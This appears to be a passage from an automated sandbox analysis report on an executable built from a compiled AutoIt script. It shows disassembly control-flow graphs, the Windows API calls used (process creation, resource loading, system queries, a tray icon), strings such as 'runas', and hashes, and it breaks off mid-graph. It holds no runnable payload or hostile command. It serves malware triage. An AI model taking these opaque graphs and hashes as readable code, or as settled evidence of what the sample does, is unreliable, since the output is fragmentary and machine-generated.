                                                                        • Part of subcall function 00007FF7C0E53CBC: CreateWindowExW.USER32 ref: 00007FF7C0E53D5F
                                                                        • Part of subcall function 00007FF7C0E53CBC: ShowWindow.USER32 ref: 00007FF7C0E53D75
                                                                        • Part of subcall function 00007FF7C0E56258: Shell_NotifyIconW.SHELL32 ref: 00007FF7C0E56350
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                                      • API String ID: 1593035822-3287110873
                                                                      • Opcode ID: 281c1e7be99c4a7b18314b13c4019a2424d473888b2523f6306895d303977498
                                                                      • Instruction ID: f28d4bf39988d1c18ce868720635db604448815cae68fb2f3476af5688b2c7a8
                                                                      • Opcode Fuzzy Hash: 281c1e7be99c4a7b18314b13c4019a2424d473888b2523f6306895d303977498
                                                                      • Instruction Fuzzy Hash: DC713B6195CA8795EA20FF60E8405F9E360BF41774FC00532E94D863AADF6CF689C7A0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 352 7ff7c0e56580-7ff7c0e565fc call 7ff7c0e74c68 call 7ff7c0e56c98 call 7ff7c0e75d00 359 7ff7c0e56737-7ff7c0e5673a 352->359 360 7ff7c0e56602-7ff7c0e56606 352->360 363 7ff7c0e9c9f5-7ff7c0e9c9fd call 7ff7c0ed2e00 359->363 364 7ff7c0e56740-7ff7c0e56753 CreateStreamOnHGlobal 359->364 361 7ff7c0e5660c-7ff7c0e56617 call 7ff7c0e85514 360->361 362 7ff7c0e9ca03-7ff7c0e9ca1e 360->362 372 7ff7c0e5661b-7ff7c0e5664e call 7ff7c0e567d8 361->372 375 7ff7c0e9ca27-7ff7c0e9ca60 call 7ff7c0e56810 call 7ff7c0e567d8 362->375 363->362 364->360 367 7ff7c0e56759-7ff7c0e56777 FindResourceExW 364->367 367->360 371 7ff7c0e5677d 367->371 373 7ff7c0e9c97e-7ff7c0e9c991 LoadResource 371->373 380 7ff7c0e566e8 372->380 381 7ff7c0e56654-7ff7c0e5665f 372->381 373->360 376 7ff7c0e9c997-7ff7c0e9c9a8 SizeofResource 373->376 384 7ff7c0e566ee 375->384 393 7ff7c0e9ca66 375->393 376->360 379 7ff7c0e9c9ae-7ff7c0e9c9ba LockResource 376->379 379->360 383 7ff7c0e9c9c0-7ff7c0e9c9f0 379->383 380->384 385 7ff7c0e566ae-7ff7c0e566b2 381->385 386 7ff7c0e56661-7ff7c0e5666f 381->386 383->360 389 7ff7c0e566f1-7ff7c0e56715 384->389 385->380 391 7ff7c0e566b4-7ff7c0e566cf call 7ff7c0e56810 385->391 390 7ff7c0e56670-7ff7c0e5667d 386->390 394 7ff7c0e56717-7ff7c0e56724 call 7ff7c0e74c24 * 2 389->394 395 7ff7c0e56729-7ff7c0e56736 389->395 396 7ff7c0e56680-7ff7c0e5668f 390->396 391->372 393->389 394->395 401 7ff7c0e566d4-7ff7c0e566dd 396->401 402 7ff7c0e56691-7ff7c0e56695 396->402 403 7ff7c0e566e3-7ff7c0e566e6 401->403 404 7ff7c0e56782-7ff7c0e5678c 401->404 402->375 406 7ff7c0e5669b-7ff7c0e566a8 402->406 403->402 407 7ff7c0e5678e 404->407 408 7ff7c0e56797-7ff7c0e567a1 404->408 406->390 410 7ff7c0e566aa 406->410 407->408 411 7ff7c0e567ce 408->411 412 7ff7c0e567a3-7ff7c0e567ad 408->412 410->385 411->373 413 7ff7c0e567c6 412->413 414 7ff7c0e567af-7ff7c0e567bb 412->414 413->411 414->396 415 7ff7c0e567c1 414->415 415->413
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: AU3!$EA06$SCRIPT
                                                                      • API String ID: 3051347437-2925976212
                                                                      • Opcode ID: 30f6ba7276d28cb9964872315e4a0112bd0f4edd02183a3a1bb8bc557d64f8ed
                                                                      • Instruction ID: 27f31272685c9fb1a58c459f5b44de0f25031023b9e2f0d856552810bbe821a4
                                                                      • Opcode Fuzzy Hash: 30f6ba7276d28cb9964872315e4a0112bd0f4edd02183a3a1bb8bc557d64f8ed
                                                                      • Instruction Fuzzy Hash: 24912272B49A4186EB20FF21D444ABDA7A8BB45BA8F814536DE4D87781DF7CF444C3A0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 482 7ff7c0e71d80-7ff7c0e71e17 call 7ff7c0e59640 GetVersionExW call 7ff7c0e57cf4 487 7ff7c0e71e1d 482->487 488 7ff7c0eb9450 482->488 489 7ff7c0e71e20-7ff7c0e71e46 call 7ff7c0e5dda4 487->489 490 7ff7c0eb9457-7ff7c0eb945d 488->490 495 7ff7c0e71e4c 489->495 496 7ff7c0e71fc1 489->496 492 7ff7c0eb9463-7ff7c0eb9480 490->492 492->492 494 7ff7c0eb9482-7ff7c0eb9485 492->494 494->489 497 7ff7c0eb948b-7ff7c0eb9491 494->497 498 7ff7c0e71e53-7ff7c0e71e59 495->498 496->488 497->490 499 7ff7c0eb9493 497->499 500 7ff7c0e71e5f-7ff7c0e71e7c 498->500 501 7ff7c0eb9498-7ff7c0eb94a1 499->501 500->500 502 7ff7c0e71e7e-7ff7c0e71e81 500->502 501->498 503 7ff7c0eb94a7 501->503 502->501 504 7ff7c0e71e87-7ff7c0e71ed6 call 7ff7c0e5dda4 502->504 503->496 507 7ff7c0e71edc-7ff7c0e71ede 504->507 508 7ff7c0eb9645-7ff7c0eb964d 504->508 511 7ff7c0e71ee4-7ff7c0e71efa 507->511 512 7ff7c0eb94ac-7ff7c0eb94af 507->512 509 7ff7c0eb964f-7ff7c0eb9658 508->509 510 7ff7c0eb965a-7ff7c0eb965d 508->510 515 7ff7c0eb9686-7ff7c0eb9692 509->515 510->515 516 7ff7c0eb965f-7ff7c0eb9674 510->516 517 7ff7c0eb9572-7ff7c0eb9579 511->517 518 7ff7c0e71f00-7ff7c0e71f02 511->518 513 7ff7c0e71f3c-7ff7c0e71f80 GetCurrentProcess IsWow64Process call 7ff7c0e76240 512->513 514 7ff7c0eb94b5-7ff7c0eb9501 512->514 527 7ff7c0eb969d-7ff7c0eb96b3 call 7ff7c0ec32f4 513->527 539 7ff7c0e71f86-7ff7c0e71f8b GetSystemInfo 513->539 514->513 522 7ff7c0eb9507-7ff7c0eb950e 514->522 515->527 523 7ff7c0eb967f 516->523 524 7ff7c0eb9676-7ff7c0eb967d 516->524 525 7ff7c0eb9589-7ff7c0eb9599 517->525 526 7ff7c0eb957b-7ff7c0eb9584 517->526 519 7ff7c0e71f08-7ff7c0e71f0b 518->519 520 7ff7c0eb959e-7ff7c0eb95b3 518->520 528 7ff7c0e71f11-7ff7c0e71f2d 519->528 529 7ff7c0eb95ed-7ff7c0eb95f0 519->529 530 7ff7c0eb95b5-7ff7c0eb95be 520->530 531 7ff7c0eb95c3-7ff7c0eb95d3 520->531 533 7ff7c0eb9510-7ff7c0eb9518 522->533 534 7ff7c0eb9534-7ff7c0eb953c 522->534 523->515 524->515 525->513 526->513 550 7ff7c0eb96b5-7ff7c0eb96d5 call 7ff7c0ec32f4 527->550 551 7ff7c0eb96d7-7ff7c0eb96dc GetSystemInfo 527->551 536 7ff7c0eb95d8-7ff7c0eb95e8 528->536 537 7ff7c0e71f33 528->537 529->513 538 7ff7c0eb95f6-7ff7c0eb9620 529->538 530->513 531->513 540 7ff7c0eb9526-7ff7c0eb952f 533->540 541 7ff7c0eb951a-7ff7c0eb9521 533->541 542 7ff7c0eb953e-7ff7c0eb9547 534->542 543 7ff7c0eb954c-7ff7c0eb9554 534->543 536->513 537->513 545 7ff7c0eb9622-7ff7c0eb962b 538->545 546 7ff7c0eb9630-7ff7c0eb9640 538->546 547 7ff7c0e71f91-7ff7c0e71fc0 539->547 540->513 541->513 542->513 548 7ff7c0eb9556-7ff7c0eb955f 543->548 549 7ff7c0eb9564-7ff7c0eb956d 543->549 545->513 546->513 548->513 549->513 553 7ff7c0eb96e2-7ff7c0eb96ea 550->553 551->553 553->547 555 7ff7c0eb96f0-7ff7c0eb96f7 FreeLibrary 553->555 555->547
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentInfoSystemVersionWow64
                                                                      • String ID: |O
                                                                      • API String ID: 1568231622-607156228
                                                                      • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                      • Instruction ID: efe60b21d9563ed03c07c162890fdd3ed7acf78d766a5b2c8630c46cca48474e
                                                                      • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                      • Instruction Fuzzy Hash: 73D18D21A9D28285FA21FF58A800975AB90AF517A4FC0017ADE8DC2775DF7CB180C7B5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 719 7ff7c0eef630-7ff7c0eef69e call 7ff7c0e76240 722 7ff7c0eef6d4-7ff7c0eef6d9 719->722 723 7ff7c0eef6a0-7ff7c0eef6b8 call 7ff7c0e5ffbc 719->723 724 7ff7c0eef71e-7ff7c0eef723 722->724 725 7ff7c0eef6db-7ff7c0eef6ef call 7ff7c0e5ffbc 722->725 731 7ff7c0eef6ba-7ff7c0eef6d2 call 7ff7c0e5ffbc 723->731 732 7ff7c0eef708-7ff7c0eef70d 723->732 728 7ff7c0eef725-7ff7c0eef729 724->728 729 7ff7c0eef736-7ff7c0eef75c call 7ff7c0e5d4cc call 7ff7c0e5e330 724->729 739 7ff7c0eef6f3-7ff7c0eef706 call 7ff7c0e5ffbc 725->739 735 7ff7c0eef72d-7ff7c0eef732 call 7ff7c0e5ffbc 728->735 748 7ff7c0eef762-7ff7c0eef7cf call 7ff7c0e5d4cc call 7ff7c0e5e330 call 7ff7c0e5d4cc call 7ff7c0e5e330 call 7ff7c0e5d4cc call 7ff7c0e5e330 729->748 749 7ff7c0eef840-7ff7c0eef84a 729->749 731->739 740 7ff7c0eef70f-7ff7c0eef717 732->740 741 7ff7c0eef719-7ff7c0eef71c 732->741 735->729 739->724 739->732 740->735 741->724 741->729 798 7ff7c0eef806-7ff7c0eef83e GetSystemDirectoryW call 7ff7c0e74c68 GetSystemDirectoryW 748->798 799 7ff7c0eef7d1-7ff7c0eef7f3 call 7ff7c0e5d4cc call 7ff7c0e5e330 748->799 750 7ff7c0eef87d-7ff7c0eef8af GetCurrentDirectoryW call 7ff7c0e74c68 GetCurrentDirectoryW 749->750 751 7ff7c0eef84c-7ff7c0eef86e call 7ff7c0e5d4cc call 7ff7c0e5e330 749->751 760 7ff7c0eef8b5-7ff7c0eef8b8 750->760 751->750 767 7ff7c0eef870-7ff7c0eef87b call 7ff7c0e78d58 751->767 763 7ff7c0eef8f0-7ff7c0eef8ff call 7ff7c0ecf464 760->763 764 7ff7c0eef8ba-7ff7c0eef8eb call 7ff7c0e6f688 * 3 760->764 774 7ff7c0eef905-7ff7c0eef95d call 7ff7c0ecfddc call 7ff7c0ecfca8 call 7ff7c0ecfafc 763->774 775 7ff7c0eef901-7ff7c0eef903 763->775 764->763 767->750 767->763 781 7ff7c0eef964-7ff7c0eef96c 774->781 809 7ff7c0eef95f 774->809 775->781 786 7ff7c0eef972-7ff7c0eefa0d call 7ff7c0ebd1f8 call 7ff7c0e78d58 * 3 call 7ff7c0e74c24 * 3 781->786 787 7ff7c0eefa0f-7ff7c0eefa4b CreateProcessW 781->787 791 7ff7c0eefa4f-7ff7c0eefa62 call 7ff7c0e74c24 * 2 786->791 787->791 811 7ff7c0eefa64-7ff7c0eefabc call 7ff7c0e54afc * 2 GetLastError call 7ff7c0e6f214 call 7ff7c0e613e0 791->811 812 7ff7c0eefabe-7ff7c0eefaca CloseHandle 791->812 798->760 799->798 824 7ff7c0eef7f5-7ff7c0eef800 call 7ff7c0e78d58 799->824 809->781 827 7ff7c0eefb3b-7ff7c0eefb65 call 7ff7c0ecf51c 811->827 818 7ff7c0eefaf5-7ff7c0eefafc 812->818 819 7ff7c0eefacc-7ff7c0eefaf0 call 7ff7c0ecf7dc call 7ff7c0ed0088 call 7ff7c0eefb68 812->819 820 7ff7c0eefafe-7ff7c0eefb0a 818->820 821 7ff7c0eefb0c-7ff7c0eefb35 call 7ff7c0e613e0 CloseHandle 818->821 819->818 820->827 821->827 824->760 824->798
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 1787492119-0
                                                                      • Opcode ID: ddb31b1ea6ffbce714698367dc00d601beb7cc94552172ff8982eeff5935b681
                                                                      • Instruction ID: 04e86f21ab5da2a86c1bbfc886ef7f39a57fbb2dbc6f1b4ca9c7cba438503062
                                                                      • Opcode Fuzzy Hash: ddb31b1ea6ffbce714698367dc00d601beb7cc94552172ff8982eeff5935b681
                                                                      • Instruction Fuzzy Hash: D9E1BF22B48B5585EB14FF26D4502BDA3A0FB84BA8F804532EE5D877A9DF38F441C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                      • String ID:
                                                                      • API String ID: 2695905019-0
                                                                      • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                      • Instruction ID: 1eef34be54a00ffdfdf17362f084cb2bcdadb48052c73f817cda9baa72e24a86
                                                                      • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                      • Instruction Fuzzy Hash: 67F05411E4C64281EA287F28A8083369261BF41BB5F944330D47E863E4DFACF49842A0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                      • API String ID: 2667193904-1575078665
                                                                      • Opcode ID: 556029334d18f1e7f1a6bcd8ff6412e7b433a3d19d3476e5022d6bd965ae193f
                                                                      • Instruction ID: 4da9e2274bf121f18bf45f772dccd41abfd90e226bab8c5c374e9f809123b77c
                                                                      • Opcode Fuzzy Hash: 556029334d18f1e7f1a6bcd8ff6412e7b433a3d19d3476e5022d6bd965ae193f
                                                                      • Instruction Fuzzy Hash: 05913F22A1CA5295EB50FF64E8405B9A364FF84764FC01132EA4D83BA5DFBCF645C7A0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 131 7ff7c0e55dec-7ff7c0e55e21 133 7ff7c0e55e23-7ff7c0e55e26 131->133 134 7ff7c0e55e91-7ff7c0e55e94 131->134 136 7ff7c0e55e98 133->136 137 7ff7c0e55e28-7ff7c0e55e2f 133->137 134->133 135 7ff7c0e55e96 134->135 140 7ff7c0e55e6b-7ff7c0e55e76 DefWindowProcW 135->140 141 7ff7c0e55e9e-7ff7c0e55ea3 136->141 142 7ff7c0e9c229-7ff7c0e9c261 call 7ff7c0e6ede4 call 7ff7c0e72c44 136->142 138 7ff7c0e55e35-7ff7c0e55e3a 137->138 139 7ff7c0e55f21-7ff7c0e55f29 PostQuitMessage 137->139 143 7ff7c0e9c2af-7ff7c0e9c2c5 call 7ff7c0eca40c 138->143 144 7ff7c0e55e40-7ff7c0e55e43 138->144 147 7ff7c0e55ec8-7ff7c0e55eca 139->147 146 7ff7c0e55e7c-7ff7c0e55e90 140->146 148 7ff7c0e55ecc-7ff7c0e55efa SetTimer RegisterWindowMessageW 141->148 149 7ff7c0e55ea5-7ff7c0e55ea8 141->149 176 7ff7c0e9c267-7ff7c0e9c26e 142->176 143->147 167 7ff7c0e9c2cb 143->167 150 7ff7c0e55f2b-7ff7c0e55f35 call 7ff7c0e74610 144->150 151 7ff7c0e55e49-7ff7c0e55e4e 144->151 147->146 148->147 152 7ff7c0e55efc-7ff7c0e55f09 CreatePopupMenu 148->152 155 7ff7c0e55eae-7ff7c0e55ebe KillTimer call 7ff7c0e55d88 149->155 156 7ff7c0e9c1b8-7ff7c0e9c1bb 149->156 169 7ff7c0e55f3a 150->169 157 7ff7c0e9c292-7ff7c0e9c299 151->157 158 7ff7c0e55e54-7ff7c0e55e59 151->158 152->147 172 7ff7c0e55ec3 call 7ff7c0e57098 155->172 162 7ff7c0e9c1f7-7ff7c0e9c224 MoveWindow 156->162 163 7ff7c0e9c1bd-7ff7c0e9c1c0 156->163 157->140 173 7ff7c0e9c29f-7ff7c0e9c2aa call 7ff7c0ebc54c 157->173 165 7ff7c0e55f0b-7ff7c0e55f1f call 7ff7c0e55f3c 158->165 166 7ff7c0e55e5f-7ff7c0e55e65 158->166 162->147 170 7ff7c0e9c1c2-7ff7c0e9c1c5 163->170 171 7ff7c0e9c1e4-7ff7c0e9c1f2 SetFocus 163->171 165->147 166->140 166->176 167->140 169->147 170->166 177 7ff7c0e9c1cb-7ff7c0e9c1df call 7ff7c0e6ede4 170->177 171->147 172->147 173->140 176->140 181 7ff7c0e9c274-7ff7c0e9c28d call 7ff7c0e55d88 call 7ff7c0e56258 176->181 177->147 181->140
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                      • Instruction ID: 1dba336b18c11b9090d1c52788c0bc69adf5caddd4fdf9e563ab818a84f6b8d1
                                                                      • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                      • Instruction Fuzzy Hash: 03516B32D8CA4381F620BFA4E865579E660AF45B64FC40831D94DC27A5DF7CF684C7A0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-2659433951
                                                                      • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                      • Instruction ID: fe5b016d70b1415a8746656f976427b8ca2ff006582e2add571b66ac84ad4312
                                                                      • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                      • Instruction Fuzzy Hash: 16313E32A08B018AE700DFA0E8447A977B4FB44768F900135CE5D97764DF7CA199CB90

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 189 7ff7c0e6e958-7ff7c0e6e9ae 190 7ff7c0eb27e4-7ff7c0eb27ea DestroyWindow 189->190 191 7ff7c0e6e9b4-7ff7c0e6e9d3 mciSendStringW 189->191 194 7ff7c0eb27f0-7ff7c0eb2801 190->194 192 7ff7c0e6ecbd-7ff7c0e6ecce 191->192 193 7ff7c0e6e9d9-7ff7c0e6e9e3 191->193 196 7ff7c0e6ecf7-7ff7c0e6ed01 192->196 197 7ff7c0e6ecd0-7ff7c0e6ecf0 UnregisterHotKey 192->197 193->194 195 7ff7c0e6e9e9 193->195 199 7ff7c0eb2835-7ff7c0eb283f 194->199 200 7ff7c0eb2803-7ff7c0eb2806 194->200 198 7ff7c0e6e9f0-7ff7c0e6e9f3 195->198 196->193 202 7ff7c0e6ed07 196->202 197->196 201 7ff7c0e6ecf2 call 7ff7c0e6f270 197->201 204 7ff7c0e6e9f9-7ff7c0e6ea08 call 7ff7c0e53aa8 198->204 205 7ff7c0e6ecb0-7ff7c0e6ecb8 call 7ff7c0e55410 198->205 199->194 203 7ff7c0eb2841 199->203 206 7ff7c0eb2813-7ff7c0eb2817 FindClose 200->206 207 7ff7c0eb2808-7ff7c0eb2811 call 7ff7c0e58314 200->207 201->196 202->192 214 7ff7c0eb2846-7ff7c0eb284f call 7ff7c0ee8c00 203->214 220 7ff7c0e6ea0f-7ff7c0e6ea12 204->220 205->198 209 7ff7c0eb281d-7ff7c0eb282e 206->209 207->209 209->199 213 7ff7c0eb2830 call 7ff7c0ed3180 209->213 213->199 214->220 220->214 222 7ff7c0e6ea18 220->222 223 7ff7c0e6ea1f-7ff7c0e6ea22 222->223 224 7ff7c0eb2854-7ff7c0eb285d call 7ff7c0ec46cc 223->224 225 7ff7c0e6ea28-7ff7c0e6ea32 223->225 224->223 226 7ff7c0eb2862-7ff7c0eb2873 225->226 227 7ff7c0e6ea38-7ff7c0e6ea42 225->227 232 7ff7c0eb2875 FreeLibrary 226->232 233 7ff7c0eb287b-7ff7c0eb2885 226->233 229 7ff7c0e6ea48-7ff7c0e6ea76 call 7ff7c0e613e0 227->229 230 7ff7c0eb288c-7ff7c0eb289d 227->230 242 7ff7c0e6ea78 229->242 243 7ff7c0e6eabf-7ff7c0e6eacc OleUninitialize 229->243 234 7ff7c0eb289f-7ff7c0eb28c2 VirtualFree 230->234 235 7ff7c0eb28c9-7ff7c0eb28d3 230->235 232->233 233->226 237 7ff7c0eb2887 233->237 234->235 238 7ff7c0eb28c4 call 7ff7c0ed321c 234->238 235->230 240 7ff7c0eb28d5 235->240 237->230 238->235 245 7ff7c0eb28da-7ff7c0eb28de 240->245 244 7ff7c0e6ea7d-7ff7c0e6eabd call 7ff7c0e6f1c4 call 7ff7c0e6f13c 242->244 243->245 246 7ff7c0e6ead2-7ff7c0e6ead9 243->246 244->243 245->246 248 7ff7c0eb28e4-7ff7c0eb28ef 245->248 249 7ff7c0eb28f4-7ff7c0eb2903 call 7ff7c0ed31d4 246->249 250 7ff7c0e6eadf-7ff7c0e6eaea 246->250 248->246 263 7ff7c0eb2905 249->263 253 7ff7c0e6ed09-7ff7c0e6ed18 call 7ff7c0e742a0 250->253 254 7ff7c0e6eaf0-7ff7c0e6eb22 call 7ff7c0e5a07c call 7ff7c0e6f08c call 7ff7c0e539bc 250->254 253->254 265 7ff7c0e6ed1e 253->265 273 